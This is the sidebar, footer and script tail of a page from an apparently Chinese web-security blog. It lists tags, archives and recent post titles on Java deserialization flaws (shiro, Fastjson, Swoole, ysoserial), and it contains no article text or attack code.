      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/DOM-Clobbering-Attack/" rel="tag">DOM Clobbering Attack</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/JSONP/" rel="tag">JSONP</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Javascript/" rel="tag">Javascript</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP%E6%AD%A3%E5%88%99%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/" rel="tag">PHP正则安全研究</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Swoole/" rel="tag">Swoole</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Variable-hijacking/" rel="tag">Variable hijacking</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag">Web安全</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fastjson/" rel="tag">fastjson</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/intigriti-Easter/" rel="tag">intigriti Easter</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/java/" rel="tag">java</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/shiro/" rel="tag">shiro</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%89%8D%E7%AB%AF%E5%AE%89%E5%85%A8/" rel="tag">前端安全</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B5%8F%E8%A7%88%E5%99%A8%E6%B8%B2%E6%9F%93/" rel="tag">浏览器渲染</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%B7%A8%E5%9F%9F/" rel="tag">跨域</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/DOM-Clobbering-Attack/" style="font-size: 10px;">DOM Clobbering Attack</a> <a href="/tags/JSONP/" style="font-size: 10px;">JSONP</a> <a href="/tags/Javascript/" style="font-size: 10px;">Javascript</a> <a href="/tags/PHP%E6%AD%A3%E5%88%99%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/" style="font-size: 10px;">PHP正则安全研究</a> <a href="/tags/Swoole/" style="font-size: 10px;">Swoole</a> <a href="/tags/Variable-hijacking/" style="font-size: 10px;">Variable hijacking</a> <a href="/tags/Web%E5%AE%89%E5%85%A8/" style="font-size: 10px;">Web安全</a> <a href="/tags/XSS/" style="font-size: 10px;">XSS</a> <a href="/tags/fastjson/" style="font-size: 15px;">fastjson</a> <a href="/tags/intigriti-Easter/" style="font-size: 10px;">intigriti Easter</a> <a href="/tags/java/" style="font-size: 20px;">java</a> <a href="/tags/shiro/" style="font-size: 10px;">shiro</a> <a href="/tags/%E5%89%8D%E7%AB%AF%E5%AE%89%E5%85%A8/" style="font-size: 10px;">前端安全</a> <a href="/tags/%E6%B5%8F%E8%A7%88%E5%99%A8%E6%B8%B2%E6%9F%93/" style="font-size: 10px;">浏览器渲染</a> <a href="/tags/%E8%B7%A8%E5%9F%9F/" style="font-size: 10px;">跨域</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">October 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">September 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">August 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">February 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/07/">July 2019</a><span class="archive-list-count">1</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/10/06/shiro-1-2-4%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8F%8A%E6%89%A9%E5%B1%95%E6%80%9D%E8%80%83/">shiro 1.2.4反序列化及扩展思考</a>
          </li>
        
          <li>
            <a href="/2020/09/29/Fastjson%E5%88%86%E6%9E%90%E7%B3%BB%E5%88%97-%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%8F%8A%E6%80%BB%E7%BB%93/">Fastjson分析系列--历史漏洞分析及总结</a>
          </li>
        
          <li>
            <a href="/2020/09/24/Fastjson%E5%88%86%E6%9E%90%E7%B3%BB%E5%88%97--1-2-22-1-2-24%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1/">Fastjson分析系列--1.2.22-1.2.24反序列化漏洞分析</a>
          </li>
        
          <li>
            <a href="/2020/09/09/Swoole-deserialization-Gadgets/">Swoole deserialization Gadgets</a>
          </li>
        
          <li>
            <a href="/2020/08/09/ysoserial-%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90/">ysoserial-调试分析</a>
          </li>
        
      </ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Links</h3>
    <div class="widget">
      <ul>
        
      </ul>
    </div>
  </div>

  
</aside>
      
    </div>
    <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 离怀秋<br>
      Powered by <a href="//hexo.io/" target="_blank">Hexo</a>
      .
      Theme by <a href="https://github.com/xiangming/landscape-plus" target="_blank">Landscape-plus</a>
    </div>
  </div>
</footer>
  </div>
  <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
    <a href="/about" class="mobile-nav-link">About</a>
  
</nav>
  <!-- totop start -->
<div id="totop">
<a title="totop"><img src="/img/scrollup.png"/></a>
</div>

<!-- totop end -->


<!-- 百度分享 start -->

<div id="article-share-box" class="article-share-box">
  <div id="bdshare" class="bdsharebuttonbox article-share-links">
    <a class="article-share-weibo" data-cmd="tsina" title="分享到新浪微博"></a>
    <a class="article-share-weixin" data-cmd="weixin" title="分享到微信"></a>
    <a class="article-share-qq" data-cmd="sqq" title="分享到QQ"></a>
    <a class="article-share-renren" data-cmd="renren" title="分享到人人网"></a>
    <a class="article-share-more" data-cmd="more" title="更多"></a>
  </div>
</div>
<script>
  function SetShareData(cmd, config) {
    if (shareDataTitle && shareDataUrl) {
      config.bdText = shareDataTitle;
      config.bdUrl = shareDataUrl;
    }
    return config;
  }
  window._bd_share_config={
    "common":{onBeforeClick: SetShareData},
    "share":{"bdCustomStyle":"/css/bdshare.css"}
  };
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

<!-- 百度分享 end -->

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>





<script src="/js/script.js"></script>


</div>
</body>
</html>
